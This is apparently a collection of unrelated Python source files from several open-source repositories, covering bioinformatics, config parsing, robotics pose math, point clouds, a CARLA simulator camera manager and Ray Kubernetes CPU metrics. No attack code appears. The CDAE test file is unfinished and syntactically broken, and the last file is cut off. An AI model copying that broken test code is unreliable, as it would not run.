def save_to_fasta(self, fn=None, description='None'):
"""Saves sequence to file in fasta format.
:param fn: Filename.
:param description: Record description
:return: None
"""
if fn is None:
fn = '{}.fasta'.format(self.record.id)
self.record.description = description
try:
with open(fn, 'w') as fl:
SeqIO.write(self.record, handle=fl, format='fasta')
fl.close()
except OSError as exc:
print(exc)
else:
print('File {} saved!'.format(fn))
def read_from_fasta(self, fn=None):
"""Reads SeqRecord from file.
        If the given file doesn't exist, the method takes the first fasta file in the current directory.
:param fn: Filename of fasta file.
:return: True if file was loaded, else False
"""
if fn is None:
for fn in os.listdir(os.curdir):
if not fn.endswith('.fasta'):
continue
with open(fn, 'r') as fl:
self.record = SeqIO.read(fl, 'fasta')
self.seq = self.record.seq
self.id = self.record.id
fl.close()
print('File {} loaded!'.format(fn))
return True
else:
self.record = SeqIO.read(fn, 'fasta')
self.seq = self.record.seq
self.id = self.record.id
print('File {} loaded!'.format(fn))
return True
return False
def blast_search(self, fn=None, dot_plot=False, window=8):
"""Makes a blast search.
:param fn: File in which results will be saved.
:param dot_plot: True/False - show dot plot of two sequences or not.
:param window: Threshold, for example (5)
:return: None
"""
if self.s_type == 'DNA' or self.s_type == 'RNA':
try:
print('Task running...')
income = NCBIWWW.qblast('blastn', 'nt', self.record.format('fasta'))
except ValueError:
income = None
else:
try:
print('Task running...')
income = NCBIWWW.qblast('blastp', 'pdb', self.record.format('fasta'))
print('Got results!')
except ValueError:
income = None
if income is not None:
if fn is None:
with open('results/{}_blast_results.xml'.format(self.id), 'w') as of:
of.write(income.read())
of.close()
else:
with open(fn, 'w') as of:
of.write(income.read())
of.close()
result = NCBIXML.read(income)
            align = result.alignments[0]
            print(align.title)
            print(align.length)
print(align.hsps[0].expect)
print(align.hsps[0].query[0:70] + '...')
print(align.hsps[0].match[0:70] + '...')
print(align.hsps[0].sbjct[0:70] + '...')
if dot_plot:
seq_one = str(align.hsps[0].query).upper()
seq_two = str(align.hsps[0].match).upper()
data = [[(seq_one[i:i + window] != seq_two[j:j + window]) for j in range(len(seq_one) - window)] for i
in range(len(seq_two) - window)]
pylab.gray()
pylab.imshow(data)
pylab.xlabel('{} (length {} bp)'.format(align.hsps[0].query, len(align.hsps[0].query)))
pylab.ylabel('{} (length {} bp)'.format(align.hsps[0].match, len(align.hsps[0].match)))
pylab.title('Dot plot using window size {}\n(allowing no mis-matches)'.format(window))
pylab.show()
else:
raise ValueError("No sequence found!")
``` |
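A minimal usage sketch for the `Sequence` class above; it assumes a Biopython release that still ships `Bio.Alphabet` (older than 1.78), since the class imports `IUPAC`:
```python
# Minimal sketch: random DNA sequence, GC content, and transcription.
sq = Sequence(size=30, seq_type='D')     # random 30-base DNA sequence
sq.show()                                # prints the sequence and its generated ID
print('GC percent:', sq.calculate_gc())
print('RNA:', sq.transcribe())           # DNA -> RNA
```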
{
"source": "777nancy/confile",
"score": 3
} |
#### File: confile/confile/confile.py
```python
import ast
import configparser
import json
import os
from abc import ABCMeta
from abc import abstractmethod
from typing import Union
import yaml
class NoDatesSafeLoader(yaml.SafeLoader):
@classmethod
def remove_implicit_resolver(cls):
if 'yaml_implicit_resolvers' not in cls.__dict__:
cls.yaml_implicit_resolvers = cls.yaml_implicit_resolvers.copy()
for first_letter, mappings in cls.yaml_implicit_resolvers.items():
cls.yaml_implicit_resolvers[first_letter] = [(tag, regexp)
for tag, regexp in mappings
if tag != 'tag:yaml.org,2002:timestamp']
class BaseConfig(metaclass=ABCMeta):
"""
This is an interface for all config classes.
"""
@abstractmethod
def get_property(self, key, *keys):
pass
@abstractmethod
def to_dict(self):
pass
class IniConfig(BaseConfig):
"""
Class for ini config file.
"""
def __init__(self, config_path: str, encoding: str = None, default_section: str = 'DEFAULT') -> None:
"""
Initialize attributes for ini config
:param config_path: ini config file path
:param encoding: file encoding
:param default_section: default section for ini config file
"""
self._default_section = default_section
self._config_dict = {}
self._has_default_section = False
parser = configparser.ConfigParser(default_section=None)
parser.read(config_path, encoding)
for section in parser.sections():
if section == default_section:
self._has_default_section = True
section_dict = {}
for key, value in parser.items(section):
try:
value = ast.literal_eval(value)
except (SyntaxError, ValueError):
pass
section_dict[key] = value
self._config_dict[section] = section_dict
def get_property(self, section: str, key: str = None) -> Union[str, list, dict, None]:
"""
Get property from arguments
:param section: section
:param key: key
:return: property
"""
section_dict = self._config_dict.get(section)
if key and section_dict is not None:
value = section_dict.get(key)
if value is None and self._has_default_section:
value = self._config_dict.get(self._default_section).get(key)
return value
else:
return section_dict
def to_dict(self) -> dict:
"""
Ini config file to dict
:return: dict of ini config file contents
"""
return self._config_dict
class JsonOrYamlConfig(BaseConfig):
"""
Super class for Json or Yaml config file class.
"""
def __init__(self, config_path: str, file_type: str, encoding: str = None) -> None:
"""
Initialize attributes for json or yaml config
:param config_path: ini config file path
:param file_type: json or yaml(yml)
:param encoding: file encoding
:raise TypeError: if file_type is not json or yaml(yml)
"""
file_type = file_type.lower()
with open(config_path, encoding=encoding) as fin:
if file_type == 'json':
self._config_dict = json.load(fin)
elif file_type in ['yml', 'yaml']:
NoDatesSafeLoader.remove_implicit_resolver()
self._config_dict = yaml.load(fin, Loader=NoDatesSafeLoader)
else:
raise TypeError('Unknown file type {}'.format(file_type))
def get_property(self, key: str, *keys: list) -> Union[str, list, dict, None]:
"""
get property from arguments
:param key: key
:param keys: keys
:return: property
"""
if type(self._config_dict) is list:
return None
sub_config_dict = self._config_dict.get(key)
if keys and sub_config_dict is not None:
for k in keys:
if type(sub_config_dict) is not dict or sub_config_dict is None:
return None
value = sub_config_dict.get(k)
sub_config_dict = value
return sub_config_dict
else:
return sub_config_dict
def to_dict(self) -> dict:
"""
config file to dict
:return: dict of config file contents
"""
return self._config_dict
class JsonConfig(JsonOrYamlConfig):
"""
Class for json config file.
"""
def __init__(self, config_path: str, encoding: str = None) -> None:
super().__init__(config_path, 'json', encoding)
class YamlConfig(JsonOrYamlConfig):
"""
Class for yaml config file.
"""
def __init__(self, config_path: str, encoding: str = None) -> None:
super().__init__(config_path, 'yaml', encoding)
def read_config(config_path: str, file_type: str = None, encoding: str = None,
default_section: str = None) -> Union[IniConfig, JsonConfig, YamlConfig]:
"""
Read config file
:param config_path: config file path
:param file_type: file type of config file
:param encoding: encoding
:param default_section: default section of ini config file (ini config file only)
:return: Config object
:raise TypeError: if file_type is not ini or json or yaml(yml)
"""
if file_type is None:
_, ext = os.path.splitext(config_path)
file_type = ext[1:]
file_type = file_type.lower()
if file_type == 'ini':
return IniConfig(config_path, encoding, default_section)
elif file_type == 'json':
return JsonConfig(config_path, encoding)
elif file_type in ['yml', 'yaml']:
return YamlConfig(config_path, encoding)
else:
raise TypeError('Unknown file type {}'.format(file_type))
``` |
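A short usage sketch for `read_config`; the config file and its keys are made up for illustration:
```python
import json

# Write a tiny hypothetical config, then read it back through read_config.
with open("app_config.json", "w") as f:
    json.dump({"database": {"host": "localhost", "port": 5432}}, f)

config = read_config("app_config.json")         # file type inferred from the extension
print(config.get_property("database", "host"))  # 'localhost'
print(config.to_dict())
```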
{
"source": "777PolarFox777/kanban-flask",
"score": 3
} |
#### File: models/card/model.py
```python
from sqlalchemy import ForeignKey
from sqlalchemy.orm import relationship
from backend.app import db
class Card(db.Model):
__tablename__ = "cards"
id = db.Column(db.Integer(), primary_key=True)
text = db.Column(db.String(500))
order = db.Column(db.Integer())
column_id = db.Column(db.Integer(), ForeignKey("columns.id"))
def __init__(self, json: dict):
if "text" in json and "order" in json and "columnId" in json:
self.text = json["text"]
self.order = json["order"]
self.column_id = json["columnId"]
else:
raise TypeError("Incorrect initial data in Card model")
def __repr__(self):
return f"<Card {self.id}>"
def json(self):
return {"id": self.id, "text": self.text, "order": self.order, "columnId": self.column_id}
``` |
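A sketch of how the `Card` model above would typically be used in a request handler; it assumes the `backend.app` database is configured and an application context is active:
```python
# Hedged sketch: the payload shape mirrors the keys checked in Card.__init__.
payload = {"text": "Write docs", "order": 1, "columnId": 2}

card = Card(payload)        # raises TypeError if a required key is missing
db.session.add(card)
db.session.commit()
print(card.json())          # {"id": ..., "text": "Write docs", "order": 1, "columnId": 2}
```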
{
"source": "779786738/anygrasp",
"score": 3
} |
#### File: anygrasp/history/Ui.py
```python
import PyQt5
from PyQt5.QtWidgets import *
from PyQt5 import QtCore, QtGui, QtWidgets
import sys
import cv2
class ui(QtWidgets.QWidget):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.setObjectName("MainWindow")
self.resize(800, 600)
self.setStyleSheet("")
self.centralwidget = QtWidgets.QWidget(self)
self.centralwidget.setObjectName("centralwidget")
        self.capture = QtWidgets.QPushButton(self.centralwidget)
self.capture.setGeometry(QtCore.QRect(160, 430, 111, 61))
self.capture.setStyleSheet("background: #555556;color: #FFFFFF;border-radius:10px")
self.capture.setObjectName("capture")
        self.grasp = QtWidgets.QPushButton(self.centralwidget)
self.grasp.setGeometry(QtCore.QRect(360, 430, 111, 61))
self.grasp.setStyleSheet("background: #555556;color: #FFFFFF;border-radius:10px")
self.grasp.setObjectName("grasp")
        self.put = QtWidgets.QPushButton(self.centralwidget)
self.put.setGeometry(QtCore.QRect(560, 430, 101, 61))
self.put.setStyleSheet("background: #555556;color: #FFFFFF;border-radius:10px")
self.put.setObjectName("put")
        self.change_pic_pos = QtWidgets.QPushButton(self.centralwidget)
self.change_pic_pos.setGeometry(QtCore.QRect(210, 30, 141, 71))
self.change_pic_pos.setStyleSheet("background: #555556;color: #FFFFFF;border-radius:10px")
self.change_pic_pos.setObjectName("change_pic_pos")
        self.set_put_pos = QtWidgets.QPushButton(self.centralwidget)
self.set_put_pos.setGeometry(QtCore.QRect(430, 30, 131, 71))
self.set_put_pos.setStyleSheet("background: #555556;color: #FFFFFF;border-radius:10px")
self.set_put_pos.setObjectName("set_put_pos")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(240, 180, 291, 171))
self.label.setObjectName("label")
self.label.setStyleSheet("background:white")
self.retranslateUi()
self.connect_event()
def retranslateUi(self):
_translate = QtCore.QCoreApplication.translate
self.capture.setText(_translate("MainWindow", "拍照"))
self.grasp.setText(_translate("MainWindow", "抓取"))
self.put.setText(_translate("MainWindow", "放置"))
self.change_pic_pos.setText(_translate("MainWindow", "切换拍照姿态"))
self.set_put_pos.setText(_translate("MainWindow", "设置放置姿态"))
def connect_event(self):
self.capture.clicked.connect(self.printself)
self.grasp.clicked.connect(self.printself)
self.put.clicked.connect(self.printself)
self.change_pic_pos.clicked.connect(self.printself)
self.set_put_pos.clicked.connect(self.printself)
def printself(self):
print("pushed!")
    def keyPressEvent(self, event):  # override the keyPressEvent() event handler
        # Keyboard press handling: PyQt calls this handler automatically,
        # so overriding it replaces the default behaviour.
        if event.key() == QtCore.Qt.Key_Escape:  # when the Esc key is pressed
            print("esc")
            self.close()  # close the application
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = ui()
ex.show()
sys.exit(app.exec_())
```
#### File: anygrasp/poseTransForm/poseTransform.py
```python
import numpy as np
from math import pi
from scipy.spatial.transform import Rotation as Rot
import json
np.set_printoptions(suppress=True)
DYNAMIC = False
STATIC = True
# Homogeneous transform to a 6-DoF pose (translation + Euler angles)
def transfrom2RPY(Trans,mode = "xyz"):
Trans = np.matrix(Trans)
R = Trans[:3,:3] # rotation matrix
T = np.matrix(Trans[:3,3]).T # translation
Eur = Rot.from_matrix(R)
Eur = Eur.as_euler(mode,False)
T = np.array(T)
return np.hstack((list(T[0]),Eur)) # 6DoF
# Grasp algorithm output (R, T) to a homogeneous transform
def getRR(R,T):
R = np.array(R)
T = np.matrix(T)
E = [[ 0, -1 , 0],
[ 0 , 0 ,-1],
[ 1 , 0, 0]]
E = np.array(E)
    R_fixed = np.matmul(R, E.T)  # corrected R
print(R_fixed)
res = np.vstack((np.hstack((R_fixed,T.T)),np.array([0,0,0,1])))
return res
def getRR_V2(RR,TT):
R = np.matrix(RR)
T = np.matrix(TT)
E1 = [[0, 0, 1],
[ 0 , -1 ,0],
[ 1 , 0, 0]]
E2 = [[ 0,0, -1],
[ 0 , 1 ,0],
[ 1 , 0, 0]]
r = Rot.from_euler('xyz',[0,0,np.pi/2])
E1 = np.array(E1)
E1 = np.matmul(r.as_matrix(),E1)
E2 = np.array(E2)
E2 = np.matmul(r.as_matrix(),E2)
    R1_fixed = np.matmul(R, E1.T)  # corrected R1
    R2_fixed = np.matmul(R, E2.T)  # corrected R2
trans1 = np.vstack((np.hstack((R1_fixed,T.T)),np.array([0,0,0,1])))
trans2 = np.vstack((np.hstack((R2_fixed,T.T)),np.array([0,0,0,1])))
if(np.array(trans1)[0][0]>0):
return trans1
return trans2
# Build a homogeneous transformation matrix
# Euler : Euler angles
# T : translation
def getTransform(m:str,Euler,T,Mode:bool):
if Mode == True:
m = m.lower()
else:
m = m.upper()
E = np.array(Euler)
T = np.matrix(T)
r = Rot.from_euler(m,E)
return np.vstack((np.hstack((r.as_matrix(),T.T)),np.array([0,0,0,1])))
def finally_succ(curPos, RR, TT):
with open("./config.json",'r') as load_f:
load_dict = json.load(load_f)
Bais = load_dict['cameraPose']
TT =np.array(TT)*1000 + np.array(Bais)
Trans1 = getTransform("xyz",curPos[3:],np.array(curPos[:3]),STATIC) # on base the tool
Trans2 = getRR(RR,TT) # on camera the target
# on tool the camera is I
Trans3 = np.dot(Trans1,Trans2) # on base the target
return transfrom2RPY(Trans3)
def GG_2_Liner_move(gg, curPos):
with open("./config.json",'r') as load_f:
load_dict = json.load(load_f)
Bais = load_dict['cameraPose']
RR = list(gg.rotation_matrices)[0]
    TT = list(gg.translations)[0]
    return finally_succ(curPos, RR, TT)
def finally_succ_V2(curPos, RR, TT):
with open("./config.json",'r') as load_f:
load_dict = json.load(load_f)
Bais = load_dict['cameraPose']
TT =np.array(TT)*1000 + np.array(Bais)
Trans1 = getTransform("xyz",curPos[3:],np.array(curPos[:3]),STATIC) # on base the tool
Trans2 = getRR_V2(RR,TT) # on camera the target
# on tool the camera is I
Trans3 = np.dot(Trans1,Trans2) # on base the target
return transfrom2RPY(Trans3)
def GG_2_Liner_move_V2(gg, curPos):
RR = list(gg.rotation_matrices)[0]
TT = list(gg.translations)[0]
return finally_succ_V2(curPos,RR,TT)
```
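A small round-trip sanity check for `getTransform` and `transfrom2RPY` from the module above; the pose values are arbitrary:
```python
import numpy as np

euler = [0.1, -0.2, 0.3]            # roll, pitch, yaw in radians
trans = [100.0, 50.0, 25.0]         # translation

T = getTransform("xyz", euler, trans, STATIC)   # 4x4 homogeneous transform
pose = transfrom2RPY(T)                         # back to [x, y, z, rx, ry, rz]

print(np.allclose(pose[:3], trans))   # True: translation recovered
print(np.allclose(pose[3:], euler))   # True: Euler angles recovered
```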
#### File: anygrasp/utils/data_utils.py
```python
import numpy as np
class CameraInfo():
    """ Camera intrinsics for point cloud creation. """
def __init__(self, width, height, fx, fy, cx, cy, scale):
self.width = width
self.height = height
self.fx = fx
self.fy = fy
self.cx = cx
self.cy = cy
self.scale = scale
def create_point_cloud_from_depth_image(depth, camera, organized=True):
""" Generate point cloud using depth image only.
Input:
depth: [numpy.ndarray, (H,W), numpy.float32]
depth image
camera: [CameraInfo]
camera intrinsics
organized: bool
whether to keep the cloud in image shape (H,W,3)
Output:
cloud: [numpy.ndarray, (H,W,3)/(H*W,3), numpy.float32]
generated cloud, (H,W,3) for organized=True, (H*W,3) for organized=False
"""
assert(depth.shape[0] == camera.height and depth.shape[1] == camera.width)
xmap = np.arange(camera.width)
ymap = np.arange(camera.height)
xmap, ymap = np.meshgrid(xmap, ymap)
points_z = depth / camera.scale
points_x = (xmap - camera.cx) * points_z / camera.fx
points_y = (ymap - camera.cy) * points_z / camera.fy
cloud = np.stack([points_x, points_y, points_z], axis=-1)
if not organized:
cloud = cloud.reshape([-1, 3])
return cloud
def transform_point_cloud(cloud, transform, format='4x4'):
""" Transform points to new coordinates with transformation matrix.
Input:
cloud: [np.ndarray, (N,3), np.float32]
points in original coordinates
transform: [np.ndarray, (3,3)/(3,4)/(4,4), np.float32]
transformation matrix, could be rotation only or rotation+translation
format: [string, '3x3'/'3x4'/'4x4']
the shape of transformation matrix
'3x3' --> rotation matrix
'3x4'/'4x4' --> rotation matrix + translation matrix
Output:
cloud_transformed: [np.ndarray, (N,3), np.float32]
points in new coordinates
"""
if not (format == '3x3' or format == '4x4' or format == '3x4'):
raise ValueError('Unknown transformation format, only support \'3x3\' or \'4x4\' or \'3x4\'.')
if format == '3x3':
cloud_transformed = np.dot(transform, cloud.T).T
elif format == '4x4' or format == '3x4':
ones = np.ones(cloud.shape[0])[:, np.newaxis]
cloud_ = np.concatenate([cloud, ones], axis=1)
cloud_transformed = np.dot(transform, cloud_.T).T
cloud_transformed = cloud_transformed[:, :3]
return cloud_transformed
def compute_point_dists(A, B):
""" Compute pair-wise point distances in two matrices.
Input:
A: [np.ndarray, (N,3), np.float32]
point cloud A
B: [np.ndarray, (M,3), np.float32]
point cloud B
Output:
dists: [np.ndarray, (N,M), np.float32]
distance matrix
"""
A = A[:, np.newaxis, :]
B = B[np.newaxis, :, :]
dists = np.linalg.norm(A-B, axis=-1)
return dists
def remove_invisible_grasp_points(cloud, grasp_points, pose, th=0.01):
""" Remove invisible part of object model according to scene point cloud.
Input:
cloud: [np.ndarray, (N,3), np.float32]
scene point cloud
grasp_points: [np.ndarray, (M,3), np.float32]
grasp point label in object coordinates
pose: [np.ndarray, (4,4), np.float32]
transformation matrix from object coordinates to world coordinates
th: [float]
                if the minimum distance between a grasp point and the scene points is greater than th, the point will be removed
Output:
visible_mask: [np.ndarray, (M,), np.bool]
mask to show the visible part of grasp points
"""
grasp_points_trans = transform_point_cloud(grasp_points, pose)
dists = compute_point_dists(grasp_points_trans, cloud)
min_dists = dists.min(axis=1)
visible_mask = (min_dists < th)
return visible_mask
def get_workspace_mask(cloud, seg, trans=None, organized=True, outlier=0):
""" Keep points in workspace as input.
Input:
cloud: [np.ndarray, (H,W,3), np.float32]
scene point cloud
seg: [np.ndarray, (H,W,), np.uint8]
segmantation label of scene points
trans: [np.ndarray, (4,4), np.float32]
transformation matrix for scene points, default: None.
organized: [bool]
whether to keep the cloud in image shape (H,W,3)
outlier: [float]
if the distance between a point and workspace is greater than outlier, the point will be removed
Output:
workspace_mask: [np.ndarray, (H,W)/(H*W,), np.bool]
mask to indicate whether scene points are in workspace
"""
if organized:
h, w, _ = cloud.shape
cloud = cloud.reshape([h*w, 3])
seg = seg.reshape(h*w)
if trans is not None:
cloud = transform_point_cloud(cloud, trans)
foreground = cloud[seg>0]
xmin, ymin, zmin = foreground.min(axis=0)
xmax, ymax, zmax = foreground.max(axis=0)
mask_x = ((cloud[:,0] > xmin-outlier) & (cloud[:,0] < xmax+outlier))
mask_y = ((cloud[:,1] > ymin-outlier) & (cloud[:,1] < ymax+outlier))
mask_z = ((cloud[:,2] > zmin-outlier) & (cloud[:,2] < zmax+outlier))
workspace_mask = (mask_x & mask_y & mask_z)
if organized:
workspace_mask = workspace_mask.reshape([h, w])
return workspace_mask
``` |
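A tiny synthetic example for `create_point_cloud_from_depth_image` from the module above, using a flat 1 m depth map:
```python
import numpy as np

# 3x4 depth image at a constant 1000 mm; scale=1000 converts to metres.
camera = CameraInfo(width=4, height=3, fx=2.0, fy=2.0, cx=2.0, cy=1.5, scale=1000.0)
depth = np.full((3, 4), 1000, dtype=np.float32)

cloud = create_point_cloud_from_depth_image(depth, camera, organized=False)
print(cloud.shape)   # (12, 3)
print(cloud[:, 2])   # every point sits at z = 1.0
```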
{
"source": "77abe77/Collaborative-Denoising-Autoencoder",
"score": 3
} |
#### File: Collaborative-Denoising-Autoencoder/datasets/CiteYouLikeA.py
```python
import os
from datasets.AbstractInputSource import AbstractInputSource
import numpy as np
class CiteYouLikeA(AbstractInputSource):
FILE_PATH = '/home/abemillan/Developer/CDAE_ML/datasets/citeulike-a/users.dat'# TODO make this path always work: os.path.abs(__file__)
def _loop_through_file_with_fn(self, fn):
# TODO
pass
def _calculate_item_count(self, n_items=0):
with open(self.FILE_PATH, 'rb') as input_file:
for user in input_file:
user = user.strip()
user = user.split()[1:]
for item in user:
if int(item) > n_items:
n_items = int(item)
return (n_items + 1)
def load_data_as_sparse(self):
with open(self.FILE_PATH, 'rb') as input_file:
for user in input_file:
user = user.strip()
user = user.split()[1:]
full_items = np.array([int(item) for item in user[1:]])
train_indices, test_indices = self.rand_split_data(full_items)
train_data = self._make_sparse_from_raw_set(train_indices)
test_data = test_indices
full_data = self._make_sparse_from_raw_set(full_items)
self.data.append(self.Data(train_data, test_data, full_data))
def load_data(self):
with open(self.FILE_PATH, 'rb') as input_file:
for user in input_file:
user = user.strip()
user = user.split()[1:]
full_items = np.array([int(item) for item in user[1:]])
train_indices, test_indices = self.rand_split_data(full_items)
train_data = [1.0 if item in train_indices else 0.0 for item in xrange(self.n_items)]
test_data = test_indices
full_data = [1.0 if item in full_items else 0.0 for item in xrange(self.n_items)]
self.data.append(self.Data(train_data, test_data, full_data))
```
#### File: models/tests/CDAE_testing.py
```python
import numpy as np
import tensorflow as tf
from models import CDAE
class CDAETesting(tf.test.TestCase):
def setUp(self):
self.CDAE_test = CDAE()
def test_variable_packing(self):
X = tf.constant()
with
    def test_precision(self):
test_set_positive_indicies = np.array([55, 32, 89, 49])
model_result = np.random.random_sample(100)
def test_recall(self):
pass
def test_MAP(self):
pass
if __name__ == '__main__':
tf.test.main()
``` |
{
"source": "77hanzzi/CARLA-Multi-ADAS-Functions",
"score": 3
} |
#### File: 77hanzzi/CARLA-Multi-ADAS-Functions/New_CameraManager.py
```python
class CameraManager(object):
def __init__(self, parent_actor, hud):
self.sensor = None
self.SupportingSensors = []
self._surface = None
# self._surface_1 = pygame.Surface((hud.dim[0]/4,hud.dim[1]/4))
self._parent = parent_actor
self._hud = hud
self._SupportSurfaceList = [pygame.Surface((hud.dim[0]/3.5,hud.dim[1]/3.5)) for i in range(1,4)]
self._recording = False
self._camera_transforms = [
carla.Transform(carla.Location(x=-10, z=4.8), carla.Rotation(pitch=-17)),
carla.Transform(carla.Location(x=1.6, z=1.7)),
carla.Transform(carla.Location(x=0.1,y=-0.3, z=1.2), carla.Rotation(pitch=-15)),
carla.Transform(carla.Location(x=-5.5, z=2.8), carla.Rotation(pitch=-15)),
carla.Transform(carla.Location(x=0.2, z=1.6), carla.Rotation(pitch=0)),
]
self._transform_index = 1
self._sensors = [
['sensor.camera.rgb', cc.Raw, 'Camera RGB'],
['sensor.camera.depth', cc.Raw, 'Camera Depth (Raw)'],
['sensor.camera.depth', cc.Depth, 'Camera Depth (Gray Scale)'],
['sensor.camera.depth', cc.LogarithmicDepth, 'Camera Depth (Logarithmic Gray Scale)'],
['sensor.camera.semantic_segmentation', cc.Raw, 'Camera Semantic Segmentation (Raw)'],
['sensor.camera.semantic_segmentation', cc.CityScapesPalette, 'Camera Semantic Segmentation (CityScapes Palette)'],
['sensor.lidar.ray_cast', None, 'Lidar (Ray-Cast)']]
self._blueprints = self._parent.get_world().get_blueprint_library()
self._world = self._parent.get_world()
bp_library = self._world.get_blueprint_library()
for item in self._sensors:
bp = bp_library.find(item[0])
if item[0].startswith('sensor.camera'):
bp.set_attribute('image_size_x', str(hud.dim[0]))
bp.set_attribute('image_size_y', str(hud.dim[1]))
elif item[0].startswith('sensor.lidar'):
bp.set_attribute('range', '5000')
item.append(bp)
self._index = None
def set_support_sensors(self):
bp_library = self._blueprints
bp_SupportingSensors = []
for item in self._sensors:
bp = bp_library.find(item[0])
if item[0].startswith('sensor.camera'):
bp.set_attribute('image_size_x', str(self._hud.dim[0]/3.5))
bp.set_attribute('image_size_y', str(self._hud.dim[1]/3.5))
elif item[0].startswith('sensor.lidar'):
bp.set_attribute('range', '5000')
bp_SupportingSensors.append(bp)
Camera_1 = self._world.spawn_actor(
bp_SupportingSensors[5],
self._camera_transforms[4],
attach_to=self._parent)
Camera_2 = self._world.spawn_actor(
bp_SupportingSensors[0],
self._camera_transforms[2],
attach_to=self._parent)
Camera_3 = self._world.spawn_actor(
bp_SupportingSensors[3],
self._camera_transforms[4],
attach_to=self._parent)
self.SupportingSensors.append(Camera_1)
self.SupportingSensors.append(Camera_2)
self.SupportingSensors.append(Camera_3)
weak_self = weakref.ref(self)
Camera_1.listen(lambda image: CameraManager._camera1_display(weak_self,image))
Camera_2.listen(lambda image: CameraManager._camera2_display(weak_self,image))
Camera_3.listen(lambda image: CameraManager._camera3_display(weak_self,image))
def toggle_camera(self):
# This is used to change the installation location of the sensors or cameras.
self._transform_index = (self._transform_index + 1) % len(self._camera_transforms)
self.sensor.set_transform(self._camera_transforms[self._transform_index])
def set_sensor(self, index, notify=True):
self.set_support_sensors()
index = index % len(self._sensors)
needs_respawn = True if self._index is None \
else self._sensors[index][0] != self._sensors[self._index][0]
if needs_respawn:
if self.sensor is not None:
self.sensor.destroy()
self._surface = None
self.sensor = self._parent.get_world().spawn_actor(
self._sensors[index][-1],
self._camera_transforms[self._transform_index],
attach_to=self._parent)
# We need to pass the lambda a weak reference to self to avoid
# circular reference.
weak_self = weakref.ref(self)
self.sensor.listen(lambda image: CameraManager._parse_image(weak_self, image))
if notify:
self._hud.notification(self._sensors[index][2])
self._index = index
def next_sensor(self):
self.set_sensor(self._index + 1)
def toggle_recording(self):
self._recording = not self._recording
self._hud.notification('Recording %s' % ('On' if self._recording else 'Off'))
def render(self, display):
if self._surface is not None:
display.blit(self._surface, (0, 0))
# display.blit(self._SupportSurfaceList[0],(480,100))
# display.blit(self._surface_1,(480,100))
display.blit(self._SupportSurfaceList[0],(10,490))
display.blit(self._SupportSurfaceList[1],(460,490))
display.blit(self._SupportSurfaceList[2],(910,490))
@staticmethod
def _parse_image(weak_self, image):
self = weak_self()
if not self:
return
if self._sensors[self._index][0].startswith('sensor.lidar'):
points = np.frombuffer(image.raw_data, dtype=np.dtype('f4'))
points = np.reshape(points, (int(points.shape[0]/3), 3))
lidar_data = np.array(points[:, :2])
lidar_data *= min(self._hud.dim) / 100.0
lidar_data += (0.5 * self._hud.dim[0], 0.5 * self._hud.dim[1])
lidar_data = np.fabs(lidar_data)
lidar_data = lidar_data.astype(np.int32)
lidar_data = np.reshape(lidar_data, (-1, 2))
lidar_img_size = (self._hud.dim[0], self._hud.dim[1], 3)
lidar_img = np.zeros(lidar_img_size)
lidar_img[tuple(lidar_data.T)] = (255, 255, 255)
self._surface = pygame.surfarray.make_surface(lidar_img)
else:
image.convert(self._sensors[self._index][1])
array = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
self._surface = pygame.surfarray.make_surface(array.swapaxes(0, 1))
if self._recording:
image.save_to_disk('_out_2/%08d' % image.frame_number)
@staticmethod
def _camera1_display(weak_self, image):
self = weak_self()
if not self:
return
image.convert(self._sensors[5][1])
array = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
self._SupportSurfaceList[0] = pygame.surfarray.make_surface(array.swapaxes(0, 1))
if self._recording:
image.save_to_disk('_out_2/%08d' % image.frame_number)
@staticmethod
def _camera2_display(weak_self, image):
self = weak_self()
if not self:
return
image.convert(self._sensors[0][1])
array = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
self._SupportSurfaceList[1] = pygame.surfarray.make_surface(array.swapaxes(0, 1))
if self._recording:
image.save_to_disk('_out_2/%08d' % image.frame_number)
@staticmethod
def _camera3_display(weak_self, image):
self = weak_self()
if not self:
return
image.convert(self._sensors[3][1])
array = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
array = np.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
self._SupportSurfaceList[2] = pygame.surfarray.make_surface(array.swapaxes(0, 1))
if self._recording:
image.save_to_disk('_out_2/%08d' % image.frame_number)
``` |
{
"source": "77loopin/ray",
"score": 3
} |
#### File: ray/dashboard/k8s_utils.py
```python
import logging
import ray._private.utils
logger = logging.getLogger(__name__)
CPU_SHARES_PATH = "/sys/fs/cgroup/cpu/cpu.shares"
CPU_USAGE_PATH = "/sys/fs/cgroup/cpuacct/cpuacct.usage"
PROC_STAT_PATH = "/proc/stat"
container_num_cpus = None
host_num_cpus = None
last_cpu_usage = None
last_system_usage = None
def cpu_percent():
"""Estimate CPU usage percent for Ray pod managed by Kubernetes
Operator.
Computed by the following steps
(1) Replicate the logic used by 'docker stats' cli command.
See https://github.com/docker/cli/blob/c0a6b1c7b30203fbc28cd619acb901a95a80e30e/cli/command/container/stats_helpers.go#L166.
(2) Divide by the number of CPUs available to the container, so that
e.g. full capacity use of 2 CPUs will read as 100%,
rather than 200%.
Step (1) above works by
dividing delta in cgroup's cpuacct.usage by
delta in total host cpu usage, averaged over host's cpus.
Since deltas are not initially available, return 0.0 on first call.
""" # noqa
global last_system_usage
global last_cpu_usage
try:
cpu_usage = _cpu_usage()
system_usage = _system_usage()
# Return 0.0 on first call.
if last_system_usage is None:
cpu_percent = 0.0
else:
cpu_delta = cpu_usage - last_cpu_usage
# "System time passed." (Typically close to clock time.)
system_delta = (
(system_usage - last_system_usage) / _host_num_cpus())
quotient = cpu_delta / system_delta
cpu_percent = round(
quotient * 100 / ray._private.utils.get_k8s_cpus(), 1)
last_system_usage = system_usage
last_cpu_usage = cpu_usage
# Computed percentage might be slightly above 100%.
return min(cpu_percent, 100.0)
except Exception as e:
        logger.exception("Error computing CPU usage of Ray Kubernetes pod: %s", e)
return 0.0
def _cpu_usage():
"""Compute total cpu usage of the container in nanoseconds
by reading from cgroup/cpuacct."""
